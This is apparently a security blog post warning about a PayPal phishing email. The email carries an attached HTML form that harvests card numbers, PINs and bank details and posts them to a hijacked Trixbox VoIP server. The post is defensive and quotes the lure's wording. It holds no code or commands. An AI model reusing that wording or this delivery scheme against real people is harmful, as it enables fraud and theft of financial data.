PayPal Phishing

PayPal phishing remains rather commonplace among all of the institutions being phished out there today. The delivery schemes do tend to change and morph throughout the year, and today's example proves that. Today, the attackers are using HTML attachments to deliver their payloads.
Of course this attack begins in your inbox as an email purporting to come from "support[dot]com" with the subject "Account Review". The body of the email gives the same old song and dance routine saying that
"We have observed activity in this account that is unusual or potentially high risk. " and they have locked your PayPal account. The from field should be hint number one that you're dealing with a scammer, aside from the fact that you received this email in the first place. You might theorize that if you were to receive an email about your PayPal account that it would actually come from PayPal.
The email goes on to instruct you on how to verify your account, and that is done by opening the attached .html document and filling out a form.The form has several fields into which you are to add some of the usual personal information such as Your name (which you'd think they'd know already), credit card number, expiration date, PIN number, and bank name. After that you are to simply click the submit button on the page. Your information is then posted to an IP address, and the bad guys have your info.
At the other end of this IP address, I'm used to find what appears to be a blank page, or a mom and pop website that has been secretly hijacked and used to store people's PI until the scammer stops back in to pick them up. This time, instead, the IP belongs to a company called Trixbox. It is actually a user interface for managing VoIP connections. Specifically an Asterisk based open source VoIP option. Finding someone to contact has not been an easy task, but we are working on trying to find someone on the other end to take this information down.